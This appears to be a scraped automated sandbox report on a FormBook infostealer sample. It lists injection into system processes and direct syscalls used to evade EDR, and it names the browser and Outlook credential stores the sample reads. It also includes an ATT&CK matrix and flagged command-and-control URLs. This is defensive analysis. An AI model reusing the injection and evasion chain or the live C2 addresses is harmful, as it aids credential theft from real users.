            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]2_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]2_2_03460854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]2_2_034BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A830 mov eax, dword ptr fs:[00000030h]2_2_0346A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]2_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]2_2_034D483A
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007EA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007EA66C
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007D81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007D81AC
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007D8189 SetUnhandledExceptionFilter,0_2_007D8189

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtClose: Direct from: 0x76F12B6C
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtOpenKeyEx: Direct from: 0x76F13C9CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtTerminateThread: Direct from: 0x76F12FCCJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtQueryValueKey: Direct from: 0x76F12BECJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtProtectVirtualMemory: Direct from: 0x76F07B2EJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 4688Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 29A9008Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007EB106 LogonUserW,0_2_007EB106
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007B3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007B3D19
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F411C SendInput,keybd_event,0_2_007F411C
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F74E7 mouse_event,0_2_007F74E7
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-19AIS.exe"Jump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007EA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007EA66C
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007F71FA
            Source: Certificate 11-19AIS.exe, auecFLppjswMvwfJiAu.exe, 00000003.00000002.3778292881.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000000.1382799109.0000000000F20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: auecFLppjswMvwfJiAu.exe, 00000003.00000002.3778292881.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000000.1382799109.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3780255851.0000000001A71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: Certificate 11-19AIS.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: auecFLppjswMvwfJiAu.exe, 00000003.00000002.3778292881.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000000.1382799109.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3780255851.0000000001A71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: auecFLppjswMvwfJiAu.exe, 00000003.00000002.3778292881.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000000.1382799109.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3780255851.0000000001A71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007D65C4 cpuid 0_2_007D65C4
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_0080091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0080091D
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_0082B340 GetUserNameW,0_2_0082B340
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007E1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_007E1E8E
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007CDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007CDDC0

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Certificate 11-19AIS.exeBinary or memory string: WIN_81
            Source: Certificate 11-19AIS.exeBinary or memory string: WIN_XP
            Source: Certificate 11-19AIS.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
            Source: Certificate 11-19AIS.exeBinary or memory string: WIN_XPe
            Source: Certificate 11-19AIS.exeBinary or memory string: WIN_VISTA
            Source: Certificate 11-19AIS.exeBinary or memory string: WIN_7
            Source: Certificate 11-19AIS.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00808C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00808C4F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_0080923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0080923B

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562318 Sample: Certificate 11-19AIS.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.techchains.info 2->30 32 16 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 6 other signatures 2->50 10 Certificate 11-19AIS.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 auecFLppjswMvwfJiAu.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 auecFLppjswMvwfJiAu.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rssnewscast.com 91.195.240.94, 49984, 49985, 49986 SEDO-ASDE Germany 22->34 36 elettrosistemista.zip 195.110.124.133, 49992, 49993, 49994 REGISTER-ASIT Italy 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Certificate 11-19AIS.exe71%ReversingLabsWin32.Trojan.AutoitInject
            Certificate 11-19AIS.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.empowermedeco.com/fo8o/?zh=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&HpnH2=lZrlsdK8B4Q0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/?zh=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&HpnH2=lZrlsdK8B4Q100%Avira URL Cloudmalware
            http://www.rssnewscast.com/fo8o/100%Avira URL Cloudmalware
            http://www.elettrosistemista.zip/fo8o/100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=100%Avira URL Cloudmalware
